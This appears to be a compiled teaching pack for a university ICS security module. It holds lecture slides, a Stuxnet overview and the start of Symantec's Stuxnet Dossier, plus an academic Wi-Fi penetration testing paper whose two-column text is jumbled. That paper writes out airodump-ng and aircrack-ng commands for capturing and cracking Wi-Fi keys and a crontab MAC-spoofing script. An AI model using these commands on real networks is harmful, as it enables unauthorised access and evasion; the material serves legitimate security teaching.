Dr Andrew McCarthy
1
Module Objectives
• Demonstrate a deep and systematic understanding of conventional and contemporary ICS

implementations and their comparison to IT systems in the context of cyber security
• Undertake the analysis of the cyber threat landscape in ICS and evaluate current cyber protection
approaches in the field
• Design and evaluate improvements in current cyber protection approaches to tackle the cyber security
challenges that arise in ICS
• Select appropriate risk modelling methods in ICS and critically evaluate their effectiveness on risk
measurement
• Critically apply the Kill Chain process to model complex cyber security incident scenarios in ICS and
develop situational awareness
• Demonstrate an understanding of industry-specific regulations and standards for the protection of ICS
2
Module delivery plan
• This module runs for 11 weeks,

• The module delivery plan can be found on blackboard,
• This is a live document and may change, all changes will be clearly
communicated with you,
• Please ensure you are keeping up. All lectures and tutorial introductions will
be recorded and uploaded to Blackboard 24 hours after the event.
3
About the module assessment
• Written Assessment 100% - Due 2nd May 2024
• Not all work completed within this module will be assessed; however, all
activities have been designed to help you gain the most from this module,
allowing you to develop and practice skills re-enforcing knowledge.
4
Structure of support and resources
• Module Leader:
Dr Andrew McCarthy – [email protected]
• Module Tutors:
• Dr Faiza Medjek - [email protected]
• Dr Nabil Djedjig - [email protected]
5
Structure of support and resources
• 1 hour weekly lecturer, (these will be recorded and available on Blackboard 24

hours after the lecture).
• 2 hour weekly tutorial (please see planner in the module handbook. Some of
the tutorial sessions will require pre-reading, to get the most from these
sessions, please ensure you come prepared, having completed any readings.
6
Equipment required for this module
• This module requires no specialist equipment; however, there are some extra
actives which will require a series of virtual machines which you will be
provided with.
• Windows 10 image
• Debian image
• Kali image
• Images are available form here: go.uwe.ac.uk/CSSVMS

7
Blackboard
This will be our main communication platform.
8
What is a system?
“The central concept ‘system’ embodies the idea of a set of elements connected
together which form a whole, this showing properties which are properties of the
whole, rather than properties of its component parts.” (Checkland, 1982, p. 3)
These elements may be physical objects, people or even ideas such as those
that make up the system of a thought. Instead of the word “elements” I use the
word “components”.
9
What is a system?
Examples:
- Car
- Transportation system
- Living organism
The performance of the system depends on the way its components fit together, not on
the performance of each component taken separately.
System > Sum of components
10
What is an Industry Control System (ICS)
“A general term that encompasses several types of control systems, including

Supervisory Control and Data Acquisition (SCADA) systems, Distributed Control
Systems (DCSs), and other control system configurations such as skid-mounted
Programmable Logic Controllers (PLCs) often found in the industrial sectors and critical
infrastructures” (Stouffer et al., 2011)
“A collection of personnel, hardware, and software that can affect or influence the safe,
secure, and reliable operation of an industrial process” (ISA/IEC-62443-1-1)
11
What is a Critical system
• Critical System is any system whose “failure” could threaten the environment,
human life or the existence of the organisation which operates the system.
(I.Sommerville, 2020)
Examples of Critical Systems

•Communication systems: telephone switching systems, aircraft radio systems, etc.
•Embedded control systems for process plants, medical devices, etc.
•Command and control systems such as air-traffic control systems, disaster
management systems, etc.
•Financial systems such as foreign exchange transaction systems, account management
systems, etc.
12
Module Overview
Goals of this module
In this module we will focus on

Industrial Control Systems and
SCADA systems.
-Nature and purpose

-Components
-Threats
-Attacks
-Risk assessment
-Associated standards
1
3
Industries reliant on ICS
Can you think of any more examples?
• Factory automation - automotive, electronics,

• Process industry - water treatment, food,
• Energy industry - gas, oil,
• Service industry - transport, logistics,
14
Basic blocks of a control system
• This is a typical control system in its

simplest form.
• Control systems can become very

complex but it is worth keeping this
module in mind.
• What are the attack areas in this

model? (Consider where changes to
these signals could affect the process)
15
Typical ICS components
16
Concepts of ICS
PURDUE ENTERPRISE REFERENCE ARCHITECTURE (PERA)
• Dealing with complexity, Industrial Control

Systems can be characterised by a hierarchy of
technology layers (the Purdue model). Higher
layers of this taxonomy are more related to
more classical security problems.
• From a security perspective

• Enterprise Zone (CIA) - Level 4
• Control Zone (safety and reliability) - Level 3
• Field Zone (safety and reliability) - Level 2-0
17
ICS Discrete process
ICS Process model
• Materials move from station to station as a unit to make a product.

• A car manufacturing plant is an example; each car can be broken down and
returned to its original materials.
18
ICS Batch process
ICS Process model
• Materials are mixed in specific quantities to make a intermediate or end

product.
• Bread making for example; mixing the flour, yeast and water to make the
dough. Once the dough is made, the process cannot be undone and returned
to the raw materials.
19
ICS Continuous model
ICS Process model
• A process which runs without interruption.

• Water treatment and gas or oil pipelines would be an example of a continuous
process
20
ICS Hybrid model
ICS Process model
• Otherwise known as reactive, this is a system which contains a discrete and

continuous process. Allowing changes to be made to continuous process
based upon variable which may change.
• Smart motorways or power grids would be an example
21
Summary of this weeks tutorial
• During this weeks lab we will be covering:

• Characteristics of an ICS (and begin a Glossary of terms)
• Typical field devices
• How these devices fit into an ICS
• Typical inputs/outputs (Digital/Analog)
22
This weeks reading
NIST Guide to Industrial Control Systems (ICS) Security (The document can be
found in the reading room)
23
Next?
• Next week we will be covering:

• People, Roles and Responsibilities – Differences between IT and ICS
• Writing a process for a given scenario
• Identifying appropriate sensors and actuators (covered during todays
tutorial)
• Produce a logic diagram for the given scenario
24
References
Checkland, P. 1999, Soft systems methodology: a 30-year retrospective, Wiley, Chichester.
I. Sommerville, “Critical Systems Engineering,” available at

https://courses.cs.washington.edu/courses/cse466/05sp/pdfs/lectures/L12-Critical_Systems.pdf [retrieved
on 5 Jan 2020]
NIST, “Guide to Industrial Control Systems (ICS) Security” available at //www.ccn-

cert.cni.es/publico/InfraestructurasCriticaspublico/Guide%20to%20Industrial%20Control%20.pdf [retrieved
on 6 January 2020]
T. J. Williams, “The Purdue enterprise reference architecture,” Computers in industry, vol. 24, no. 2, pp.
141–158, 1994.
25
STUXNET
Overview of stuxnet
Stuxnet
Primarily written to target an industrial control system or set of similar systems.
Its nal goal is to reprogram ICSs by modifying code on PLCs to make them
work in a manner the attacker intended and to hide those changes from the
operator of the equipment [6].
fi
Stuxnet: Attack scenario
• First, the attackers needed to conduct reconnaissance.

• As each PLC is con gured in a unique manner, the attackers would rst need
the ICS’s schematics. These design documents may have been stolen by an
insider or even retrieved by other malware (early version of Stuxnet or other
malicious binary).
• The attackers would have needed to obtain the digital certificates from
someone who may have physically entered the premises of the two companies
and stole them.
• The nal version of Stuxnet couldn’t have been developed without this
knowledge [6].
fi
fi
fi
• Attackers would need to setup a mirrored environment that would include the
necessary ICS hardware, such as PLCs, modules, and peripherals in order to
test their code. The full cycle may have taken six months and ve to ten core
developers not counting numerous other individuals, such as quality
assurance and management [6].
• Weaponisation phase in the cyber kill chain model (we’ll talk about this in
future lectures).
fi
• To infect their target, Stuxnet would need to be introduced into the target
environment. This may have occurred by infecting a willing or unknowing
third party, such as a contractor who perhaps had access to the facility, or
an insider. The original infection may have been introduced by removable
drive.
• Once Stuxnet had infected a computer within the organization it began to

spread in search of Field PGs, which are typical Windows computers but
used to program PLCs.
• Since most of these computers (Field PGs) are non-networked, Stuxnet would
rst try to spread to other computers on the LAN through a zero-day
vulnerability, a two year old vulnerability, infecting Step 7 projects, and
through removable drives. Propagation through a LAN likely served as the
rst step and propagation through removable drives as a means to cover the
last and nal hop to a Field PG that is never connected to an untrusted
network.
fi
fi
fi
• When Stuxnet nally found a suitable computer (Field PG), one that ran Step
7, it would then modify the code on the PLC. These modi cations likely
sabotaged the system.
• Victims attempting to verify the issue would not see any rogue PLC code as
Stuxnet hides its modi cations.
fi
fi
fi
What were the vulnerable points in the attack scenario?

Journal of Xi’an Shiyou University, Natural Science Edition ISSN : 1673-064X
Ethical Hacking of IEEE 802.11 Encryption Protocols

Sandesh Jain, Sarthak Pruthi, Vivek Yadav
Department of Information Technology

Delhi Technological University, Delhi,India
Abstract - The widespread usage of smart terminals such as

smartphones, which provide significant convenience in our II. LITERATURE REVIEW
daily lives, has resulted in an increase in information In most residential and business networks, the IEEE 802.11
security issues. Researchers are increasingly concerned about standard defines WLAN characteristics; 802 deals with LAN
network security and calculations. As more devices join a wireless
and MAN, while.11 deals with WLAN. The available radio
network, important and sensitive data is transferred over the air
between users, making data packets easy to sniff and grab. The frequency spectrum varies significantly depending on the
purpose of this project is to perform penetration testing to find regulatory domain. Collision-avoidance carrier-sense multiple
flaws in the WEP, WPA, and 802.11i WPA2, WPA3 security access and medium access control are used in the 802.11
protocols, as well as to conduct anonymous attacks against them
using the macchanger script. Penetration testing in WEP was protocol family, which means that equipment listens for other
carried out using Kali Linux and its Aircrack-ng tools, which users on a channel before transmitting each frame. The first
exploited a 4-way handshake for WPA/WPA2. edition of the standard was released in 1997. The protocols are
typically used in conjunction with IEEE 802.2 to carry Internet
Index Terms— Encryption, Protocols, WPA, WPA2, four-
Protocol traffic. 802.11a, 802.11b, and 802.11g are the most
way handshake, KRACK, WPA3.
extensively used and supported standards.
I. INTRODUCTION III. TOOLS AND TECHNOLOGIES USED

Wireless networks are one of the more recent innovations that Tools and Technologies used to implement and perform
the internet has brought into our lives. Wireless technology is working model to wifi encryption were:
the mechanism of sharing information using invisible waves in ● Wifi Adapter
the air using electromagnetic or acoustic waves. The challenge ● Raspberry pi kit
of information security is becoming increasingly critical as ● Wifi Router
wireless network technology develops and gets more widely ● Raspberry Pi (Power Adapter)
used. ● Bluetooth Adapter
Wireless Fidelity (WiFi) is a modern wireless network model ● Kali Linux
defined by the IEEE 802.11 standard. A hostile activity ● Aircrack-ng, Airodump-ng, Airplay-ng
intended targeting wireless system information or wireless
networks is known as a wireless attack. The wireless network IV. WLAN PROTOCOLS
has several faults of its own. It uses radio waves to send signals
A. Working on WLAN Protocols
and must first establish a connection before being used. A
penetration test is a malicious attack on a target system that 1. Wired Equivalent Privacy (WEP)
achieves access control by emulating an attacker's techniques
Wired Equivalent Privacy(WEP) is a security protocol which
and methods with the client's legal authorization; it is a test
was introduced as part of IEEE 802.11 standard in 1997. It uses
method for evaluating information system security control
an RC4 encryption algorithm to encrypt the plain text and
measures. This paper provides a WiFi penetration test method
unencrypted integrity check value to ensure the integrity of the
based on Kali Linux that uses methods such as monitoring,
plain text when it is transmitted from one end to the other. It
sniffing, capturing, data analysis, WiFi password cracking,
operates at the data link layer and the physical layer. In 2001
pseudo-wireless access point spoofing, and other techniques to
major flaws such as short IV size, keystream reuse which
improve the security of WiFi networks.
proved that data transmitted can be easily captured and
http://xisdxjxsu.asia VOLUME 18 ISSUE 5 108 -112

tampered. With these flaws WPA was introduced to remove the function PBKDF2. These routines are used to reduce
vulnerability of weak encryption techniques. vulnerabilities to brute force attacks because of their high
computational cost.
2. Wireless Protected Access(WPA)
PMK = PBKDF2(HMAC-SHA1, PSK, SSID, 4096, 256)
WPA was created as a WiFi security protocol. It's similar to
WEP, but it encrypts data using a temporal key integrity B. Comparison of Different WLAN Protocols
technique (TKIP). To avoid the attacks that WEP allows, TKIP
provides a new 128-bit key for each packet. Users can upgrade
to TKIP from earlier WLAN equipment without changing
hardware because TKIP comprises several methods that
encapsulate WEP. Message integrity Check (MIC), IV
sequencing mechanism, Per-packet key mixing function, and
Re-keying mechanism are four additional algorithms included
in TKIP to boost key strength.
A per-packet key mixing mechanism is used to improve
cryptographic strength. A re-keying approach is employed to
generate a new key for every 10,000 packets. A hashing-based
initialization-vector sequencing technique is used. WPA uses
TKIP, which dynamically changes the encryption key used by
the computers, preventing intruders from matching the secure
network's encryption key. A message authentication code
(MAC) is a cryptographic way of confirming that
communications have not been tampered with. WPA uses the
Extensible Authentication Protocol (EAP) to authenticate
computers rather than relying exclusively on the plaintext of
their MAC address.
C. Vulnerability/Weaknesses of WLAN Protocols
3. Wireless Protected Access2(WPA2)
1. Vulnerability of WEP
Although Wi-Fi signals are broadcast in the air and can be
readily intercepted, encrypting wireless data is critical for As IV is short i.e of 24 bits, there can be cases when two packets
security. WPA II is an 802.11 wireless security standard that are captured using the same IV. This shows the vulnerability of
employs 128-bit encryption and passwords to prevent Short IV size. Also as there is no particular way to generate IV,
unauthorized access to critical information. there can be a possibility when wifi is using the same IV for a
long period of time. This highlights the Keystream
This protocol uses a single pass-key (PSK) that all devices and
vulnerability. When plain text is associated with the
the Access Point share for network authentication. The PSK can
unencrypted Integrity Check Value , it leads to brute force
be 8 to 63 characters long. An attacker can gain access to the
attacks by the attackers.
network if he discovers this one-of-a-kind PSK. Every device
develops and maintains a PMK based on the PSK or the AP
2. Vulnerability of WPA/WPA2-PSK
name until it changes. When a client attempts to connect to an
authenticator, the 4-way handshake procedure begins, and a WPA is similar to WEP, but it uses temporal key integrity
Pairwise Transient Key (PTK) is generated, which is used to protocol(TKIP) to increase the encryption. TKIP encapsulates
encrypt data between a client and an access point and is changed WEP using various algorithms. WPA2 on the other hand uses
at least once every 65,535 packets. Advanced Encryption Standard. Communication of packets
between the Client and Authenticator occurs using a 4-way
Pairwise Master Key Generation
handshake and it takes place between client and AP whenever a
Using the function below, all devices calculate PMK from PSK. client tries to connect to an AP. PMK is calculated using the
The data is encoded using HMAC-SHA1 by the key derivation PBKDF2 hashing technique. By entering SSID, self-created

pass, and SSID length into this method, the attacker can build a Figure 1. Sniff all the packets from the target AP
hashed key and compare it to the captured hashed key. The AP
and client verify that the credentials (WPA Key) used to initiate 1.2 Crack WEP Key from the captured packets using the
the connection are correct and then exchange the key to encrypt command - “aircrack-ng <filename of stored packets>”.
all the traffic from that point onwards.
The cryptographic key is installed whenever the client receives

the third handshake message. A 4-way handshake's weak point
lies at this stage, where messages might be misplaced or deleted.
When the AP fails to receive message 4 (acknowledgement
message) from the client, it re-transmits message 3 and lets the
client receive it several times by reinstalling the same Figure 2. Cracking WEP key from the captured packets
cryptographic key each time the third message is received. The
assault takes place here.
2. Attack on WPA/WPA2
3. Vulnerability of WPA3
2.1 PTK is generated using PMK and PBKDF2 hashing
WPA3 shows vulnerability in its DragonFly Handshake where function, this is the loophole for attackers to exploit as this data
dragonfly means the mechanism through which the user is sent in an unencrypted format. The pass, which can be
authenticates itself. It uses strong elliptical curves for computed via a dictionary attack with a solid 4-way handshake
encryption but hackers can force it to use weaker curves for captured, is the attacker's lone unknown value in computing the
encryption.Another vulnerability is side channel attack which PMK. We don't have a cryptographic flaw in WPA2, thus
uses an unprotected code, i.e which can be modified using if- there's no other method to reverse engineer that key.
then-else branch in Dragonfly algorithm to guess the password
generation method.
D. Attacks on WLAN protocols
1. Attack on WEP
One can capture the packet and inject it into traffic to force an
access point for creating a new packet with a new IV and
continue to do so till there are two packets using the same IV.
Using the vulnerability of short IV size one can figure out the
secret key used in encrypting and decrypting the plain text.
1.1 Sniff all packets from target Access Point using the Fig 3. Cracking passphrase from the captured four-way
handshake
command - “airodump-ng --channel 2 --bssid <MAC
ADDRESS> --write packets wlan0”. 2.3 KRACK for WPA2 (Key Reinstallation Attack)
It's used to get around the WPA2 protocol's weakness. As
It will capture all packets and store them in .cap file format. previously mentioned, the attacker can impersonate the AP by
re-transmitting message-3 multiple times. When the client
attempts to reconnect to the AP, the attacker can force it to
connect to the phoney AP. It can operate as a middleman.
Attackers can crack the pass with the captured handshake using
brute force and dictionary assaults.

Fig 4. Cracking passphrase using KRACK
3. Attack on WPA3
Fig 6. Pseudo Code for MacChanger
Downgrade Attack - As some devices do not support new
protocols, transition mode can be exploited through two
different ways. First one is to modify the beacons by being man
in the middle showing that a WPA3-enabled router can only be VI. CONCLUSION
used as WPA2. And second is if the SSID name of the targeted
WPA3 network is known, one can forge a man in the middle WEP was introduced in 1999 it has a vulnerability of short IV
redirecting every request of WPA3 to connect to WPA2 access size which leads to cracking of WEP key. WPA was introduced
point. Once it act as WPA2 attacker can exploit the four way in 2003 which uses TKIP that dynamically changes the key
handshake of WPA2 above as explained in attacks of WPA2 which system uses. In the case of WEP the key was static. Later
on in 2004 WPA2 was introduced to mitigate the chances of
brute force attacks which was seen in WPA by using Advanced
E. MAC SPOOFING Encryption Standard techniques. As key in WPA2 can be
cracked using KRACK attack, later on in 2018 WPA3 protocol
For protecting the individual’s privacy, mac address should be was introduced which has a different and longer key size as
anonymous. Therefore MAC SPOOFING is done before compared to the other protocols. Also WPA3 uses a
performing any kind of attack on the above mentioned simultaneous authentication method. Still some downgrade
protocols. attacks can be performed on WPA3 as described above. Every
Algorithm to spoof MAC address: protocol has some vulnerabilities which lead to cracking of
password for different wifi. These are getting mitigated as soon
1 ifconfig wlan0 down ( Down the interface) as they are identified.
2 macchanger -a wlan0 ( Change the mac address )
3 ifconfig wlan0 up ( Up the interface)
Store this code in the crontab so that whenever the system starts VII. REFERENCES
code execute itself and mac address get changed automatically.
[1] G. Ola, “Penetration Testing on a Wireless Network .,” 2013.
[2] A. O. Karen Scarfone, Murugiah Souppaya, Amanda Cody,

“Technical Guide to Information Security Testing and Assessment
Recommendations of the National Institute of Standards and
Technology,” Nist Spec. Publ., vol. 800, pp. 1–80, 2008, [Online].
Available:
https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication80
0.
[3] M. Vanhoef and F. Piessens, “Key Reinstallation Attacks,” pp.

Figure 5: Mac Spoofing Script 1313–1328, 2017, doi: 10.1145/3133956.3134027.
Pseudo-Code to spoof MAC address using macchanger. [4] N. Golmie, N. Chevrollier, and O. Rebala, “Bluetooth and WLAN
coexistence: challenges and solutions,” IEEE Wirel. Commun., vol. 10,
no. 6, pp. 22–29, Dec. 2003, doi: 10.1109/MWC.2003.1265849.

[5] M. Kyei and M. Asante, “Penetration Testing of IEEE 802.11 Second Author – Sarthak Pruthi, Department of
Encryption Protocols using Kali Linux Hacking Tools,” Int. J.
Information Technology, Delhi Technological University,
Comput. Appl., vol. 176, no. 32, pp. 26–33, 2020, doi:
10.5120/ijca2020920365.
Delhi,India, [email protected]
Third Author – Vivek Yadav, Department of
[6] T. Kropeit, “Don’t Trust Open Hotspots: Wi-Fi Hacker Detection Information Technology, Delhi Technological University,
and Privacy Protection via Smartphone,” 2015.
Delhi,India, [email protected]
[7] A. Yacchirena, D. Alulema, D. Aguilar, D. Morocho, F. Encalada, Correspondence Author – Dr. Kapil Sharma, Head of
and E. Granizo, “Analysis of attack and protection systems in Wi-Fi Department of Information Technology, Delhi
wireless networks under the Linux operating system,” in 2016 IEEE
International Conference on Automatica (ICA-ACCA), Oct. 2016, pp.
Technological University, Delhi,India, [email protected]
1–7, doi: 10.1109/ICA-ACCA.2016.7778423.
[8] H. Peng, “WIFI network information security analysis research,” in

2012 2nd International Conference on Consumer Electronics,
Communications and Networks (CECNet), Apr. 2012, pp. 2243–2245,
doi: 10.1109/CECNet.2012.6201786.
[9] Y. Chen, W. Wang, and Q. Zhang, “Privacy-preserving location

authentication in WiFi with fine-grained physical layer information,”
in 2014 IEEE Global Communications Conference, Dec. 2014, pp.
4827–4832, doi: 10.1109/GLOCOM.2014.7037570.
[10] A. Ye, Q. Li, Q. Zhang, and B. Cheng, “Detection of Spoofing

Attacks in WLAN-Based Positioning Systems Using WiFi Hotspot
Tags,” IEEE Access, vol. 8, no. 1, pp. 39768–39780, 2020, doi:
10.1109/ACCESS.2020.2976189.
[11] S. Dhall, S. K. Pal, and K. Sharma, “A chaos-based probabilistic

block cipher for image encryption,” J. King Saud Univ. - Comput. Inf.
Sci., vol. 34, no. 1, pp. 1533–1543, Jan. 2022, doi:
10.1016/j.jksuci.2018.09.015.
[12] D. Kumar and D. S. S., “Enhancing Security Mechanisms for

Healthcare Informatics Using Ubiquitous Cloud,” J. Ubiquitous
Comput. Commun. Technol., vol. 2, no. 1, pp. 19–28, 2020, doi:
10.36548/jucct.2020.1.003.
[13] S. Shakya, “an Efficient Security Framework for Data Migration

in a Cloud Computing Environment,” J. Artif. Intell. Capsul. Networks,
vol. 01, no. 01, pp. 45–53, 2019, doi: 10.36548/jaicn.2019.1.006.
[14] P. W. Nätverk, “PUBLIC WI-FI NETWORKS Sammanfattning.”
[15] S. Sukhija and S. Gupta, “Wireless Network Security Protocols A

Comparative Study,” Int. J. Emerg. Technol. Adv. Eng., vol. 2, no. 1,
2012.
AUTHORS
First Author – Sandesh Jain, Department of Information
Technology, Delhi Technological University, Delhi,India,
[email protected]

Security Response
W32.Stuxnet Dossier
Version 1.4 (February 2011)
Nicolas Falliere, Liam O Murchu,

and Eric Chien
While the bulk of the analysis is complete, Stuxnet is an incredibly large

Contents and complex threat. The authors expect to make revisions to this document
Introduction........................................................ 1 shortly after release as new information is uncovered or may be publicly
Executive Summary............................................ 2 disclosed. This paper is the work of numerous individuals on the Syman-
Attack Scenario................................................... 3 tec Security Response team over the last three months well beyond the
Timeline............................................................... 4 cited authors. Without their assistance, this paper would not be possible.
Infection Statistics.............................................. 5
Stuxnet Architecture........................................ 12 Introduction
Installation........................................................ 16
Load Point......................................................... 20 W32.Stuxnet has gained a lot of attention from researchers and me-
Command and Control...................................... 21 dia recently. There is good reason for this. Stuxnet is one of the
Windows Rootkit Functionality........................ 24 most complex threats we have analyzed. In this paper we take a de-
Stuxnet Propagation Methods......................... 25 tailed look at Stuxnet and its various components and particularly
Modifying PLCs................................................. 36 focus on the final goal of Stuxnet, which is to reprogram industrial
Payload Exports................................................ 50 control systems. Stuxnet is a large, complex piece of malware with
Payload Resources............................................ 51 many different components and functionalities. We have already
Variants............................................................. 53 covered some of these components in our blog series on the top-
Summary........................................................... 55 ic. While some of the information from those blogs is included here,
Appendix A........................................................ 56 this paper is a more comprehensive and in-depth look at the threat.
Appendix B ....................................................... 58 Stuxnet is a threat that was primarily written to target an industrial
Appendix C........................................................ 59 control system or set of similar systems. Industrial control systems are
Revision History................................................ 68 used in gas pipelines and power plants. Its final goal is to reprogram
industrial control systems (ICS) by modifying code on programmable
logic controllers (PLCs) to make them work in a manner the attacker in-
tended and to hide those changes from the operator of the equipment.
In order to achieve this goal the creators amassed a vast array of com-
ponents to increase their chances of success. This includes zero-day
exploits, a Windows rootkit, the first ever PLC rootkit, antivirus evasion
W32.Stuxnet Dossier
Security Response
techniques, complex process injection and hooking code, network infection routines, peer-to-peer updates, and
a command and control interface. We take a look at each of the different components of Stuxnet to understand
how the threat works in detail while keeping in mind that the ultimate goal of the threat is the most interesting
and relevant part of the threat.
Executive Summary
Stuxnet is a threat targeting a specific industrial control system likely in Iran, such as a gas pipeline or power
plant. The ultimate goal of Stuxnet is to sabotage that facility by reprogramming programmable logic controllers
(PLCs) to operate as the attackers intend them to, most likely out of their specified boundaries.
Stuxnet was discovered in July, but is confirmed to have existed at least one year prior and likely even before.
The majority of infections were found in Iran. Stuxnet contains many features such as:
• Self-replicates through removable drives exploiting a vulnerability allowing auto-execution.
Microsoft Windows Shortcut ‘LNK/PIF’ Files Automatic File Execution Vulnerability (BID 41732)
• Spreads in a LAN through a vulnerability in the Windows Print Spooler.
Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability (BID 43073)
• Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execu-
tion Vulnerability (BID 31874).
• Copies and executes itself on remote computers through network shares.
• Copies and executes itself on remote computers running a WinCC database server.
• Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is
loaded.
• Updates itself through a peer-to-peer mechanism within a LAN.
• Exploits a total of four unpatched Microsoft vulnerabilities, two of which are previously mentioned vulner-
abilities for self-replication and the other two are escalation of privilege vulnerabilities that have yet to be
disclosed.
• Contacts a command and control server that allows the hacker to download and execute code, including up-
dated versions.
• Contains a Windows rootkit that hide its binaries.
• Attempts to bypass security products.
• Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabo-
tage the system.
• Hides modified code on PLCs, essentially a rootkit for PLCs.
Page 2
W32.Stuxnet Dossier
Security Response
Attack Scenario
The following is a possible attack scenario. It is only speculation driven by the technical features of Stuxnet.
Industrial control systems (ICS) are operated by a specialized assembly like code on programmable logic control-
lers (PLCs). The PLCs are often programmed from Windows computers not connected to the Internet or even the
internal network. In addition, the industrial control systems themselves are also unlikely to be connected to the
Internet.
First, the attackers needed to conduct reconnaissance. As each PLC is configured in a unique manner, the attack-
ers would first need the ICS’s schematics. These design documents may have been stolen by an insider or even
retrieved by an early version of Stuxnet or other malicious binary. Once attackers had the design documents and
potential knowledge of the computing environment in the facility, they would develop the latest version of Stux-
net. Each feature of Stuxnet was implemented for a specific reason and for the final goal of potentially sabotag-
ing the ICS.
Attackers would need to setup a mirrored environment that would include the necessary ICS hardware, such as
PLCs, modules, and peripherals in order to test their code. The full cycle may have taken six months and five to
ten core developers not counting numerous other individuals, such as quality assurance and management.
In addition their malicious binaries contained driver files that needed to be digitally signed to avoid suspicion.
The attackers compromised two digital certificates to achieve this task. The attackers would have needed to
obtain the digital certificates from someone who may have physically entered the premises of the two companies
and stole them, as the two companies are in close physical proximity.
To infect their target, Stuxnet would need to be introduced into the target environment. This may have occurred
by infecting a willing or unknowing third party, such as a contractor who perhaps had access to the facility, or an
insider. The original infection may have been introduced by removable drive.
Once Stuxnet had infected a computer within the organization it began to spread in search of Field PGs, which
are typical Windows computers but used to program PLCs. Since most of these computers are non-networked,
Stuxnet would first try to spread to other computers on the LAN through a zero-day vulnerability, a two year old
vulnerability, infecting Step 7 projects, and through removable drives. Propagation through a LAN likely served
as the first step and propagation through removable drives as a means to cover the last and final hop to a Field
PG that is never connected to an untrusted network.
While attackers could control Stuxnet with a command and control server, as mentioned previously the key com-
puter was unlikely to have outbound Internet access. Thus, all the functionality required to sabotage a system
was embedded directly in the Stuxnet executable. Updates to this executable would be propagated throughout
the facility through a peer-to-peer method established by Stuxnet.
When Stuxnet finally found a suitable computer, one that ran Step 7, it would then modify the code on the PLC.
These modifications likely sabotaged the system, which was likely considered a high value target due to the large
resources invested in the creation of Stuxnet.
Victims attempting to verify the issue would not see any rogue PLC code as Stuxnet hides its modifications.
While their choice of using self-replication methods may have been necessary to ensure they’d find a suitable
Field PG, they also caused noticeable collateral damage by infecting machines outside the target organization.
The attackers may have considered the collateral damage a necessity in order to effectively reach the intended
target. Also, the attackers likely completed their initial attack by the time they were discovered.
Page 3
W32.Stuxnet Dossier
Security Response
Timeline
Table 1
W32.Stuxnet Timeline
Date Event
November 20, 2008 Trojan.Zlob variant found to be using the LNK vulnerability only later identified in Stuxnet.
April, 2009 Security magazine Hakin9 releases details of a remote code execution vulnerability in the Printer Spooler
service. Later identified as MS10-061.
June, 2009 Earliest Stuxnet sample seen. Does not exploit MS10-046. Does not have signed driver files.
January 25, 2010 Stuxnet driver signed with a valid certificate belonging to Realtek Semiconductor Corps.
March, 2010 First Stuxnet variant to exploit MS10-046.
June 17, 2010 Virusblokada reports W32.Stuxnet (named RootkitTmphider). Reports that it’s using a vulnerability in the
processing of shortcuts/.lnk files in order to propagate (later identified as MS10-046).
July 13, 2010 Symantec adds detection as W32.Temphid (previously detected as Trojan Horse).
July 16, 2010 Microsoft issues Security Advisory for “Vulnerability in Windows Shell Could Allow Remote Code Execution
(2286198)” that covers the vulnerability in processing shortcuts/.lnk files.
Verisign revokes Realtek Semiconductor Corps certificate.
July 17, 2010 Eset identifies a new Stuxnet driver, this time signed with a certificate from JMicron Technology Corp.
July 19, 2010 Siemens report that they are investigating reports of malware infecting Siemens WinCC SCADA systems.
Symantec renames detection to W32.Stuxnet.
July 20, 2010 Symantec monitors the Stuxnet Command and Control traffic.
July 22, 2010 Verisign revokes the JMicron Technology Corps certificate.
August 2, 2010 Microsoft issues MS10-046, which patches the Windows Shell shortcut vulnerability.
August 6, 2010 Symantec reports how Stuxnet can inject and hide code on a PLC affecting industrial control systems.
September 14, 2010 Microsoft releases MS10-061 to patch the Printer Spooler Vulnerability identified by Symantec in August.
Microsoft report two other privilege escalation vulnerabilities identified by Symantec in August.
September 30, 2010 Symantec presents at Virus Bulletin and releases comprehensive analysis of Stuxnet.
Page 4
W32.Stuxnet Dossier
Security Response
Infection Statistics
On July 20, 2010 Symantec set up a system to monitor traffic to the Stuxnet command and control (C&C) serv-
ers. This allowed us to observe rates of infection and identify the locations of infected computers, ultimately
working with CERT and other organizations to help inform infected parties. The system only identified command
and control traffic from computers that were able to connect to the C&C servers. The data sent back to the C&C
servers is encrypted and includes data such as the internal and external IP address, computer name, OS version,
and if it’s running the Siemens SIMATIC Step 7 industrial control software.
As of September 29, 2010, the data has shown that there are approximately 100,000 infected hosts. The follow-
ing graph shows the number of unique infected hosts by country:
Figure 1
Infected Hosts
The following graph shows the number of infected organizations by country based on WAN IP addresses:
Figure 2
Infected Organizations (By WAN IP)
Page 5
W32.Stuxnet Dossier
Security Response
We have observed over 40,000 unique external IP addresses, from over 155 countries. Looking at the percentage
of infected hosts by country, shows that approximately 60% of infected hosts are in Iran:
Figure 3
Geographic Distribution of Infections
Stuxnet aims to identify those hosts which have the Siemens Step 7 software installed. The following chart
shows the percentage of infected hosts by country with the Siemens software installed.
Figure 4
Percentage of Stuxnet infected Hosts with Siemens Software installed
Looking at newly infected IP addresses per day, on August 22 we observed that Iran was no longer reporting new
infections. This was most likely due to Iran blocking outward connections to the command and control servers,
rather than a drop-off in infections.
Page 6
W32.Stuxnet Dossier
Security Response
Figure 5
Rate of Stuxnet infection of new IPs by Country
The concentration of infections in Iran likely indicates that this was the initial target for infections and was
where infections were initially seeded. While Stuxnet is a targeted threat, the use of a variety of propagation
techniques (which will be discussed later) has meant that Stuxnet has spread beyond the initial target. These
additional infections are likely to be “collateral damage”—unintentional side-effects of the promiscuous initial
propagation methodology utilized by Stuxent. While infection rates will likely drop as users patch their comput-
ers against the vulnerabilities used for propagation, worms of this nature typically continue to be able to propa-
gate via unsecured and unpatched computers.
By February 2011, we had gathered 3,280 unique samples representing three different variants. As described in
the Configuration Data Block section, Stuxnet records a timestamp, along with other system information, within
itself each time a new infection occurs. Thus, each sample has a history of every computer that was infected,
including the first infection. Using this data, we are able to determine:
• Stuxnet was a targeted attack on five different organizations, based on the recorded computer domain name.
• 12,000 infections can be traced back to these 5 organizations
• Three organizations were targeted once, one was targeted twice, and another was targeted three times.
• Domain A was targeted twice (Jun 2009 and Apr 2010).
• The same computer appears to have been infected each time.
• Domain B was targeted three times (Jun 2009, Mar 2010, and May 2010).
• Domain C was targeted once (Jul 2009).
• Domain D was targeted once (Jul 2009).
